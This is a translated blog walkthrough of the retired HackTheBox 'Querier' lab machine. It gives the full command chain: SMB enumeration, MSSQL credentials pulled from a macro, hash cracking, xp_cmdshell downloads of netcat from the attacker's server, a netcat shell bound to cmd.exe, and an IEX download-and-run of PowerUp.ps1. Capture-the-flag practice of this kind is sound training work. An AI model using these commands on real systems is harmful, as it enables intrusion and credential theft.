Passing the laboratory machine for the Pentacot Hackthebox - Querier

Hello, Habr! In this article, you will learn about a method of attacking a remote server using the features of MsSQL, creating a reverse shell for fixing in the system, and an example of operating a poorly configured group policy in Windows.



Under the cut, we will talk about our experience of passing the Querier laboratory machine on the hackthebox portal.



For those who do not know what hackthebox is, this is a portal where you can test your pentest skills in practice, there are CTF tasks and laboratory machines themselves.



Disclaimer
The rules of the service say: " Dont share how you hacked each machine with other members. This includes the invite code generation and all challenges . " But since this machine is no longer active and is stored in the Retired Machines section, only VIP members can access it.







Collection of information



Let's start our exploration by starting port scanning with nmap.



nmap –sC –Pn –A 10.10.10.125
      
      









We list the ports found.



Enumerate 139/445 / tcp (smb)



We will use the smbclient utility to access the SMB server resources.



 smbclient –L //10.10.10.125
      
      





After going through all the resources, we find in the Reports directory the file “Currency Volume Report.xlsm”.







If you open this file with standard Microsoft Excel, then it will appear at first glance completely empty.



We analyze the file using the binwalk utility, which will help you look at the embedded files of the xlsm document.







From binwalk's output, we found some interesting files contained in xlsm.

Using the –e flag, unpack it.



 binwalk –e Currency\ Volume\ Report.xlsm
      
      









Now we will use the strings utility to output printed characters. Going through the files, we find interesting data in vbaProject.bin. It looks like we found the credentials for the mssql server.







To summarize the information currently received:





So let's try to connect to the server using the script from the impacket module.



 python mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
      
      





Get access to MsSQL.







Enumerate MsSQL



We list the information that is useful to us using the commands from the article .

After executing SQLi, we get a hash from the password of the user mssql-svc.







To get the password explicitly, it is necessary to remove it using any tool convenient for you.



  1.  john --format=netntlmv2 hash.txt
          
          



  2.  hashcat -m 5600 -a 3 hash.txt
          
          





We get the password from mssql-svc .



Connecting to SQL with new credential loans .



 python mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.10.10.125 -windows-auth
      
      





The rights of this user allow us to execute xp_cmdshell



About xp_cmdshell
MsSQL comes with a large set of advanced stored procedures. The most interesting of them is xp_cmdshell. It provides access to the command line of the operating system.



Get the reverse shell



We are trying to get the shell through netcat, for this we need to upload it to the attacked server.



We go to the directory on our machine where netcat is located and run:



 python –m SimpleHTTPServer
      
      





In the mssql shell to download netcat (nc.exe) to the remote server, execute the powershell command, specifying the save path.



 xp_cmdshell "powershell.exe Invoke-WebRequest "http://10.10.xx:8000/nc.exe" – OutFile "C:\Users\mssql-svc\Desktop\nc.exe" "
      
      





We start netcat to listen on port 4444.



 xp_cmdshell "powershell C:/Users/mssql-svc/Desktop/nc.exe -l -p 4444 -e cmd.exe"
      
      





We start netcat on our side, specifying the ip and port of the attacked server and get the shell.



 nc 10.10.10.125 4444
      
      





Run the script from PowerShellMafia to increase privileges.



 powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.xx:8000/PowerUp.ps1\"); Invoke-AllChecks
      
      









As a result of the script, we got the administrator credentials.



We go to smb resources with new credentials and permissions.











Take the root.txt flag. Victory!



All Articles